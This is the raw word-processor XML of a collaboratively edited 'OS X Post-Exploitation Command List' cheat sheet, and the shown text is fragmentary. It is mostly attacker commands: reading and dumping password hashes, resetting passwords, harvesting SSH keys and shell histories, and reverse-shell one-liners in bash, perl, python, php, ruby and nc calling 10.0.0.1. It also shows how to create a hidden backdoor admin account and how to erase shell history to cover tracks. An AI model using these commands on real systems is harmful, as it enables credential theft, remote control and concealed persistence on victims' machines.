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firstLine="72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OS X Po</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">st-Exploitation Command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99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If for any reason you cannot access/edit these files in the future, please contact </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000099"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mubix@hak5.org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download these files in any format using Google Doc’s File-&gt;Download As method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color w:val="000099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If you are viewing this on anything other than Google Docs then you can get access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and Windows docs here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="000099"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://bit.ly/nuc0N0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve"> HYPERLINK "http://bit.ly/nuc0N0"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DISCLAIMER: Anyone can edit these docs, and all that entails and implies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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n5c6jwvxwrzn" w:id="0"/>
      <w:bookmarkEnd w:id="0"/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zpfd5vtaii5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fzpfd5vtai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5y4eyawqsnk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Blind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4a2l63h4nc0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SYSTEM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rex4ao8g82p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Networking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tetuy5g88en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Configs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yw4n75cerl5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Packages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qye0dwlq54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Finding Important Files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ylx0u55ysmk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Files to pull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t52kkp9zuad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Remote System Access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4hig80dc0yj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Priv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y4eyawqsnkb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind Files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(things to pull when all you can do is blindly read) LFI/dir traversal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/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)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a2l63h4nc0g" w:id="3"/>
      <w:bookmarkEnd w:id="3"/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sw_vers -productName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sw_vers -productVersion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system_profiler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defaults read com.apple.recentitems RecentApplications | grep Name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defaults read com.apple.recentitems RecentDocuments | grep Name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mdfind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printenv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ps aux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ps ea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bob (read password hash of bob)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dscl localhost -read /Search/Users/bob ShadowHashData | tail -1 | xxd -r -p | plutil -convert xml1 -o - - (Dump in workable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dscl localhost -passwd /Search/Users/bob (change bob’s password without needing current)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dscl . -read /Users/&lt;username&gt; ShadowHashData | cut -f9-25 -d" " | cut -f3 -d ":" | tr -d ' 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/Library/Application Support/VMware Fusion/vmrun list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/Library/Application Support/VMware Fusion/vmrun CopyFileFromHostToGuest windowsmalicious.exe aWindowsVM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/Library/Application Support/VMware Fusion/vmrun captureScreen WindowsVM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mdutil -i off / (turn off SpotLight indexing on / - replace ‘off’ with ‘on’ to turn it back on - useful if you want to not have any files you dump locally indexed - replace ‘/’ with ‘volumeName’ if not working on boot volume)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Snow Leopard and Lion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dscacheutil -q user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dscacheutil -q group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lookupd -q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lookupd -q group</w:t>
        <w:br w:type="textWrapping"/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ex4ao8g82py" w:id="4"/>
      <w:bookmarkEnd w:id="4"/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netstat -np tcp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netstat -np udp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etuy5g88en6" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configs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/private/etc/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/Library/Application Support/VMware Fusion/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w4n75cerl50" w:id="6"/>
      <w:bookmarkEnd w:id="6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port installed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/Applications/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ye0dwlq54m" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Important Files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-ma ~/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/Users/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/Users/*/.ssh/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/Users/*/.gnupg/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 -alh /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Volumes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ylx0u55ysmk0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files to Pull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j9nyyhb6vzj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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t52kkp9zuadd" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote System Access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hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://support.apple.com/kb/HT2370</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> instructions to use kickstart to turn on vnc from the commandline (only works as an admin)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333333"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -users admin -privs -all -restart -agent -menu (enable vnc access)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333333"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -configure -access -off (kill vnc server)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hig80dc0yjf" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priv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/Library/Application Support/Objective Development/Little Snitch/rules.xpl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current Linux list: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(lets remove anything that doesn’t work (or doesn’t mean anything) on OS X),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Please indicate the version of OS X on which the command works)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# System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uname -a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ps aux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ps -aef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arch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who -a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gcc -v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mysql --version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perl -v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ruby -v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df -k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mount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last -a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lastlogin (*bsd)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getenforce  &lt;- does not work on Lion no idea if this work in previous versions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dmesg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lsusb&lt;- does not work on Lion no idea it this work on previous versions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lshw  &lt;- does not work on Lion no idea it this work on previous versions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free -m  &lt;- does not work on Lion no idea it this work on previous versions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du -h --max-depth=1 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which nmap (see if it’s already installed)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bin/nmap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which nc (see if it’s already installed)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bin/&lt;whatever you want&gt;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jps -l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java -version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# Networking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hostname -f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ip addr show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ifconfig -a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route -n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/etc/network/interfaces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iptables -L -n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netstat -anop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netstat -r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netstat -nltupw (root with raw sockets)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arp -a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lsof -nPi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# Configs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-aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2&gt;/dev/null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/etc/issue{,.net}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/etc/passwd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/etc/shadow (gotta try..)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/etc/shadow~ # (sometimes there when edited with gedit)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/etc/master.passwd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/etc/group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/etc/crontab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/etc/sysctl.conf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for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)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/etc/resolv.conf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/etc/samba/smb.conf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pdbedit -L -w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pdbedit -L -v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/etc/exports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/etc/auto.master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/etc/auto_maste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/etc/fstab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/etc/exports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/etc/sysconfig/ -type f -exec cat {} \;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cat /etc/sudoers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# Package Sources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/etc/apt/sources.list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-l /etc/yum.repos.d/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 /etc/yum.conf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# Finding Important Files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/var/log -type f -exec ls -la {} \;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-alhtr /mnt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-alhtr /Volumes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-alhtr /tmp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-alhtr /home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/Users/*/.ssh/*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/home -type f -iname '.*history'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-lart /etc/rc.d/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tar | grep [.]tar$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tgz | grep [.]tgz$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sql l grep [.]sql$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settings | grep [.]php$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config.inc | grep [.]php$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/Users/*/id*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.properties | grep [.]properties # java config files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locate .xml | grep [.]xml # java/.net config files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/sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids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# Per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/Users/*/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/Users/*/.ssh/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/Users/*/.ssh/authorized_keys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/Users/*/.ssh/known_hosts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/Users/*/.*hist*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find -type f /Users/*/.vnc /Users/*/.subversion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grep ^ssh /Users/*/.*hist*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grep ^telnet `/Users/*/.*hist*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grep ^mysql /Users/*/.*hist*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/Users/*/.viminfo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sudo -l # if sudoers is not readable, this sometimes works per user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crontab -l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# Priv (sudo’d or as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-alh /root/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/etc/sudoers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/etc/shadow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/etc/master.passwd # OpenBSD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cat /var/spool/cron/crontabs/*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lsof -nPi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ls /Users/*/.ssh/*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# Reverse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000099"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">starting list sourced from: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"http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" </w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000099"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet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bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1 # No /dev/tcp on Mac OS X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perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'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python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'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php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'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" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore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hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f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hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm -display 10.0.0.1:1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hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listener-     Xnest :1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" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add permission to connect-  xhost +victimIPf</w:t>
        <w:br w:type="textWrapping"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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_82r8jboa7h4a" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding a User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The following commands can be used to create a new user in Terminal:</w:t>
        <w:br w:type="textWrapping"/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 UserShell /bin/bash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 RealName “USER NAME“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 UniqueID 503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 PrimaryGroupID 20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PrimaryGroupID of 80 creates an Admin user. Change to PrimaryGroupID of 20 to create a Standard user.</w:t>
        <w:br w:type="textWrapping"/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-create /Users/new_user NFSHomeDirectory /Users/new_user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-passwd /Users/new_user changeme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dscl . append /Groups/admin GroupMembership new_user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You may need to create the home directory as well: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createhomedir -u new_user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widowControl w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ufd08gl127cm" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Covering your Tracks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HIDE USER</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : after creating your backdoor user, bear in mind that it can be seen on login screen and in preferences. to avoid this, you need to make your user hidden. use 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i w:val="1"/>
          <w:color w:val="38761d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sudo dscl . create /Users/myuser IsHidden 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="93c47d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myuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is your username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you later want to make it unhidden, just change the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IsHidden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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value to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="93c47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. that is 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i w:val="1"/>
          <w:color w:val="38761d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sudo dscl . create /Users/myuser IsHidden 0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93c4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Don’t forget that your home directory can be easily seen too, that is if u set it to default. move your directory to a directory that is not easily seen. lets say </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="b6d7a8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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="93c47d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b6d7a8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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 directory.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&gt; sudo mv /Users/myuser /var/myuser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8761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command then updates the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myuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to the new one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/var/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sudo dscl . -create /Users/hiddenuser NFSHomeDirectory /var/hiddenuser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this then removes the myuser public sharepoint folder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sudo dscl . -delete "/SharePoints/myuser's Public Folder"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br w:type="textWrapping"/>
        <w:t xml:space="preserve">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https://support.apple.com/en-au/HT203998</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more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84xvdrass6z5" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use dseditgroup to allow users access to services (ssh, screen sharing, and more)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Login (SSH)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User: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username -t user com.apple.access_ssh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Group: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groupname -t group com.apple.access_ssh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 Sharing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User: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username -t user com.apple.access_screensharing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Group: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groupname -t group com.apple.access_screensharing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Administrators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User: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username -t user _lpadmin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  <w:t xml:space="preserve">Group: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dseditgroup -o edit -n /Local/Default -u localadmin -p -a groupname -t group _lpadmin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-o specifies the operation (edit in this case)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-n specifies the domain (another example is /LDAPv3/127.0.0.1 on an ODM)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-u is the admin user to authenticate with (use diradmin for network domains)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-p tells it to prompt for a password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-a tells it to add a user or group</w:t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-t specifies the type, user or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7l98st2zafub" w:id="15"/>
      <w:bookmarkEnd w:id="1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etc/shadow on Mac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Starting with Lion, there is a shadow file per user. All of those are stored in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/var/db/dslocal/nodes/Default/users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and are accessible by root only. For example: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8761d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shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ls -lah /var/db/dslocal/nodes/Default/users/</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">total 296</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">drwx------  77 root  wheel   2.6K Jul 27 20:30 .</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">drw-------  12 root  wheel   408B Jul 27 20:30 ..</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">-rw-------   1 root  wheel   4.0K Jul 27 20:30 Guest.plist</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">-rw-------   1 root  wheel   260B Jul 27 20:17 _amavisd.plist</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">-rw-------   1 root  wheel   254B Jul 27 20:17 _appleevents.plist</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">-rw-------   1 root  wheel   261B Jul 27 20:17 _appowner.plist</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">-rw-------   1 root  wheel   276B Jul 27 20:17 _appserver.plist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Also, those are binary property list files. The easiest way of viewing them is using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plist</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. For example: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$ plutil -p /var/db/dslocal/nodes/Default/users/root.plist </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">{</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  "smb_sid" =&gt; [</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    0 =&gt; "XXXX-XXXX"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  "uid" =&gt; [</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    0 =&gt; "0"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  "passwd" =&gt; [</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    0 =&gt; "XXYYXX"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br w:type="textWrapping"/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4bcu61sqe7v2" w:id="16"/>
      <w:bookmarkEnd w:id="16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remove history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rm ~/.bash_history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&gt; history -c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this will delete your recent history</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId10" w:type="default"/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sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">OS X Post Exploitation Command List - Page: </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:b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support.apple.com/en-au/HT203998" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/nuc0N0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://support.apple.com/kb/HT2370" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell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